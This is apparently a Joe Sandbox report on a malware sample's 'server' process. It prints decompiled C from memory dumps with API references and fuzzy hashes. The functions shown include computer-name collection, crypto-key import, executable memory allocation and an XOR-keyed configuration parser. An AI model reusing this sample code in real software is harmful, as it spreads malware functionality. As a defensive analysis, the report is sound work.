Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 9cebb39133ea3a88662f61ed608ff7430c018c758c72e8b87e8a76df9eacbb47
Instruction ID: a73341babc5042e2f1073b93024795ebc77f70286c92964d73673081bd4e20df
Opcode Fuzzy Hash: 9cebb39133ea3a88662f61ed608ff7430c018c758c72e8b87e8a76df9eacbb47
Instruction Fuzzy Hash: 9801B171711346BFEB106E6ECC44FA77B8DEB85744F049091B94ECB282D670C842C660

Uniqueness

Uniqueness Score: -1.00%

Function 02B8790B Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02B8790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02B84358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2b8a348; // 0x29fd5b8
						_t20 = _t68 + 0x2b8b270; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02B84984(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x02b87911
0x02b87914
0x02b87924
0x02b8792d
0x02b87931
0x02b879ff
0x02b87a05
0x02b87a05
0x02b8794b
0x02b87950
0x02b87954
0x02b8795a
0x02b8795f
0x02b87966
0x02b87975
0x02b87975
0x02b87979
0x02b8797b
0x02b87987
0x02b87992
0x02b8799d
0x02b879a1
0x02b879ab
0x02b879af
0x02b879b1
0x02b879b6
0x02b879bd
0x02b879cd
0x02b879cd
0x02b879b6
0x02b879af
0x02b879cf
0x02b879d4
0x02b879d9
0x02b879d9
0x02b879dc
0x02b879e5
0x02b879ea
0x02b879ea
0x02b879ef
0x02b879f4
0x02b879f4
0x02b879ef
0x02b87979
0x02b879f6
0x02b879fc
0x00000000

APIs

Part of subcall function 02B84358: SysAllocString.OLEAUT32(80000002), ref: 02B843B5
Part of subcall function 02B84358: SysFreeString.OLEAUT32(00000000), ref: 02B8441B

SysFreeString.OLEAUT32(?), ref: 02B879EA
SysFreeString.OLEAUT32(02B84D42), ref: 02B879F4

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 921b5fb2c39db0cbb9abfbc2aafb1b8a8b0d5be6f88c02cf5d01e89e7d3f1774
Instruction ID: 6d31116c1b702bfa9077dc2dd013cc503f7d877fe7bc447f260ea9e315ad62ef
Opcode Fuzzy Hash: 921b5fb2c39db0cbb9abfbc2aafb1b8a8b0d5be6f88c02cf5d01e89e7d3f1774
Instruction Fuzzy Hash: 86315B76500249FFCF11EFA8C888C9BBB7AFBC97487244698F9099B210D7319D51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D52AD3 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D52AFB
Module32First.KERNEL32(00000000,00000224), ref: 02D52B1B

Memory Dump Source

Source File: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D4C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d4c000_server.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 6fa4d2428e1b40063b34ddb305c7119da96bb5c4bd970f2fb6308f8ceb83ef23
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 17F062356007216FEB303FB99C8DB6A77E8EF49724F100628EE46911C0DBB0EC498A61

Uniqueness

Uniqueness Score: -1.00%

Function 02B8472F Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E02B8472F(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02B833DC(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02B861DA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x02b84734
0x02b8473f
0x02b84741
0x02b84747
0x02b84749
0x02b8474e
0x02b84757
0x02b8475b
0x02b84764
0x02b84768
0x02b84777
0x02b8476a
0x02b8476b
0x02b84770
0x02b84770
0x02b84768
0x02b8475b
0x02b84780

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,02B83DCD,00000000,00000000,?,7625E910,02B83DCD), ref: 02B84747

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

GetComputerNameExA.KERNELBASE(00000003,00000000,02B83DCD,02B83DCE,?,7625E910,02B83DCD), ref: 02B84764

Part of subcall function 02B861DA: RtlFreeHeap.NTDLL(00000000,00000000,02B86383,00000000,?,00000000,00000000), ref: 02B861E6

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 2351745e67700ce96313f1d21e53a539099058f921a48098d7fa4ec6d4ef5102
Instruction ID: 05d41e0b6e6e90e9d996a8dd1f7fbdc4355ed65e48716b81178df408ab7d163c
Opcode Fuzzy Hash: 2351745e67700ce96313f1d21e53a539099058f921a48098d7fa4ec6d4ef5102
Instruction Fuzzy Hash: B8F0303AA0011AEAEB11E6AA8C40EAF76BDDBD5658F510095A908D3140EF70DA01C670

Uniqueness

Uniqueness Score: -1.00%

Function 02B85006 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B85006(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2b8a2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x2b8a1c8 = GetTickCount();
				_t5 = E02B854D8(_a4);
				if(_t5 == 0) {
					_t5 = E02B8213E(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E02B86392(_t9) != 0) {
							 *0x2b8a300 = 1; // executed
						}
						_t7 = E02B82523(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}

0x02b85006
0x02b8500f
0x02b85015
0x02b8501c
0x02b85020
0x00000000
0x02b85020
0x02b8502d
0x02b85032
0x02b85039
0x02b8503f
0x02b85046
0x02b8504f
0x02b85051
0x02b85051
0x02b8505b
0x00000000
0x02b8505b
0x02b85046
0x02b85060

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,02B8107E,?), ref: 02B8500F
GetTickCount.KERNEL32 ref: 02B85023

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: CountCreateHeapTick
String ID:
API String ID: 2177101570-0
Opcode ID: ae1724bbfa5260d04cb167658df4f7f735ecd32c29afcf3d0b3ff0e7b50066a0
Instruction ID: 757ca9f534449f85356a02b83b62ef109b3bd2fba5990c75eb83263d5e3e87ee
Opcode Fuzzy Hash: ae1724bbfa5260d04cb167658df4f7f735ecd32c29afcf3d0b3ff0e7b50066a0
Instruction Fuzzy Hash: 8BF09230AC0706AAEB323F70DC1572536D5EF04784FA588A6E90DE6180EB75D460DF66

Uniqueness

Uniqueness Score: -1.00%

Function 02B60E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02B60223,?,?), ref: 02B60E19
SetErrorMode.KERNELBASE(00000000,?,?,02B60223,?,?), ref: 02B60E1E

Memory Dump Source

Source File: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b60000_server.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 7700ffe7cd4f85c85d3bb5e7d82ceb342598ce666b89786baa88953638a98cec
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 75D0123154512877D7003AD5DC0DBDD7B1CEF09B66F008451FB0DD9080C774954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 02B82839 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E02B82839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2b8a348; // 0x29fd5b8
				_t4 = _t15 + 0x2b8b3e8; // 0x55889a0
				_t20 = _t4;
				_t6 = _t15 + 0x2b8b174; // 0x650047
				_t17 = E02B8790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02B8661C(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x02b82843
0x02b8284a
0x02b8284b
0x02b8284c
0x02b8284d
0x02b82853
0x02b82858
0x02b82858
0x02b82862
0x02b82874
0x02b8287b
0x02b828a9
0x02b8287d
0x02b8287f
0x02b82884
0x02b828a6
0x02b82886
0x02b82889
0x02b82890
0x02b82895
0x02b82897
0x02b82897
0x02b8289c
0x02b8289c
0x02b82884
0x02b828b0

APIs

Part of subcall function 02B8790B: SysFreeString.OLEAUT32(?), ref: 02B879EA

Part of subcall function 02B8661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02B84B72,004F0053,00000000,?), ref: 02B86625
Part of subcall function 02B8661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02B84B72,004F0053,00000000,?), ref: 02B8664F
Part of subcall function 02B8661C: memset.NTDLL ref: 02B86663

SysFreeString.OLEAUT32(00000000), ref: 02B8289C

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 43d6e8e1b2a9a14d378052fece042f41d9c7662050bafaa3de51f32c2dc82f4c
Instruction ID: 4d7ca30b77a206d5b614e7388b0d27c2900761f407b259f6087983a2ed448f0f
Opcode Fuzzy Hash: 43d6e8e1b2a9a14d378052fece042f41d9c7662050bafaa3de51f32c2dc82f4c
Instruction Fuzzy Hash: 5201B131900119BFEF01AFA4CC40AAEBBB9FF04344F014565ED0AE7060E770A911CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02B861DA Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B861DA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x2b8a2d8, 0, _a4); // executed
				return _t2;
			}

0x02b861e6
0x02b861ec

APIs

RtlFreeHeap.NTDLL(00000000,00000000,02B86383,00000000,?,00000000,00000000), ref: 02B861E6

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: cb73bfe1e8efdca26a0a327e4a9dc9f633f85c0cb75b3114176e336298187059
Instruction ID: 80d1657935cd9838736928be02f68e17c5da27cee39c59940802f2b44b094648
Opcode Fuzzy Hash: cb73bfe1e8efdca26a0a327e4a9dc9f633f85c0cb75b3114176e336298187059
Instruction Fuzzy Hash: 99B01271980200EBCF214F00DE04F057A21A750740F104811F34C0507082320430FB16

Uniqueness

Uniqueness Score: -1.00%

Function 02D52792 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D527E3

Memory Dump Source

Source File: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D4C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d4c000_server.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a258ced318e9bb12d2094ea442d37d0e3c9b18136565bab460f62ffa6f4e34c5
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: BA112A79A00208EFDB01DF98C989E98BBF5AF08751F0580A4F9489B361D375EA50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B833F1 Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B833F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E02B858BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x2b8a2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E02B82839(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x02b833f1
0x02b833f9
0x02b83410
0x02b8342b
0x02b8342f
0x02b83434
0x02b83436
0x02b83448
0x02b83454
0x02b83438
0x02b83438
0x02b8343d
0x02b83442
0x02b83442
0x02b83436
0x02b8345a
0x02b8345e
0x02b8345e
0x02b83405
0x02b8340a
0x02b8340e
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 02B82839: SysFreeString.OLEAUT32(00000000), ref: 02B8289C

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74AD3E00,?,00000000,?,00000000,?,02B8528E,?,004F0053,05589228,00000000,?), ref: 02B83454

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 988e4c380e61236b1b3e2b784c7ccdc4413c9713076a8980bcffc61a33a79c1e
Instruction ID: 89e35dde27bbe44f9c0c8086178d82a6d2fd44ecd190c83b049f178b39061730
Opcode Fuzzy Hash: 988e4c380e61236b1b3e2b784c7ccdc4413c9713076a8980bcffc61a33a79c1e
Instruction Fuzzy Hash: 3F014B32901619BBCF23AF54CC01FEA3BA5EF04B90F0884A5FE0D9A220D731D960DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B85063 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E02B85063(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E02B81508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E02B833DC(_a8 + _a8);
					if(_t21 != 0) {
						E02B822EA(_a4, _t21, _t23);
					}
					E02B861DA(_a4);
				}
				return _t21;
			}

0x02b8506b
0x02b85072
0x02b85074
0x02b85083
0x02b8508a
0x02b85099
0x02b8509d
0x02b850a4
0x02b850a4
0x02b850ac
0x02b850b1
0x02b850b6

APIs

lstrlen.KERNEL32(00000000,00000000,02B83ECE,00000000,?,02B866D9,00000000,02B83ECE,?,7625E910,02B83ECE,00000000,05589610), ref: 02B85074

Part of subcall function 02B81508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02B85088,00000001,02B83ECE,00000000), ref: 02B81540
Part of subcall function 02B81508: memcpy.NTDLL(02B85088,02B83ECE,00000010,?,?,?,02B85088,00000001,02B83ECE,00000000,?,02B866D9,00000000,02B83ECE,?,7625E910), ref: 02B81559
Part of subcall function 02B81508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02B81582
Part of subcall function 02B81508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02B8159A
Part of subcall function 02B81508: memcpy.NTDLL(00000000,7625E910,05589610,00000010), ref: 02B815EC

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: dd039c9e960b2f72f7fd3a5a5affa5f00841d7479617954629405dac0829a8a3
Instruction ID: a6f1a50a72dbe5524109ff7c57ad924b399582f9ef9446bd8e09cb6ef9dbfa32
Opcode Fuzzy Hash: dd039c9e960b2f72f7fd3a5a5affa5f00841d7479617954629405dac0829a8a3
Instruction Fuzzy Hash: 60F05E36100108BBCF227E95DC00DEA3BAEEF843A0B418062FD0DCA110DB31DA55DBA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02B81D8A Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02B81D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t116;
				void* _t119;
				intOrPtr _t122;

				_t119 = __esi;
				_t116 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x2b8a344; // 0x43175ac3
				if(E02B810F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
					 *0x2b8a374 = _v8;
				}
				_t33 =  *0x2b8a344; // 0x43175ac3
				if(E02B810F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x2b8a344; // 0x43175ac3
				_push(_t116);
				if(E02B810F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
					L67:
					HeapFree( *0x2b8a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x2b8a344; // 0x43175ac3
						_t45 = E02B836C5(_t104, _t102, _t98 ^ 0x523046bc);
					}
					_push(_t119);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2b8a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x2b8a344; // 0x43175ac3
						_t46 = E02B836C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2b8a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x2b8a344; // 0x43175ac3
						_t47 = E02B836C5(_t104, _t102, _t90 ^ 0x1b5903e6);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2b8a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x2b8a344; // 0x43175ac3
						_t48 = E02B836C5(_t104, _t102, _t86 ^ 0x267c2349);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x2b8a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x2b8a344; // 0x43175ac3
						_t49 = E02B836C5(_t104, _t102, _t82 ^ 0x167db74c);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x2b8a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x2b8a344; // 0x43175ac3
						_t50 = E02B836C5(_t104, _t102, _t78 ^ 0x02ddbcae);
					}
					if(_t50 == 0) {
						L41:
						 *0x2b8a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x2b8a344; // 0x43175ac3
								_t51 = E02B836C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E02B85B85(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E02B8607C();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x2b8a344; // 0x43175ac3
								_t52 = E02B836C5(_t104, _t102, _t70 ^ 0x93710135);
							}
							if(_t52 != 0 && E02B85B85(0, _t52) != 0) {
								_t122 =  *0x2b8a3cc; // 0x5589610
								E02B85364(_t122 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x2b8a344; // 0x43175ac3
								_t53 = E02B836C5(_t104, _t102, _t65 ^ 0x175474b7);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x2b8a348; // 0x29fd5b8
								_t22 = _t54 + 0x2b8b5f3; // 0x616d692f
								 *0x2b8a370 = _t22;
								goto L60;
							} else {
								_t64 = E02B85B85(0, _t53);
								 *0x2b8a370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x2b8a344; // 0x43175ac3
										_t56 = E02B836C5(_t104, _t102, _t61 ^ 0xf8a29dde);
									}
									if(_t56 == 0) {
										_t57 =  *0x2b8a348; // 0x29fd5b8
										_t23 = _t57 + 0x2b8b899; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E02B85B85(0, _t56);
									}
									 *0x2b8a3e0 = _t58;
									HeapFree( *0x2b8a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x02b81d8a
0x02b81d8a
0x02b81d8a
0x02b81d8a
0x02b81d8d
0x02b81daa
0x02b81db8
0x02b81db8
0x02b81dbd
0x02b81dd7
0x02b82045
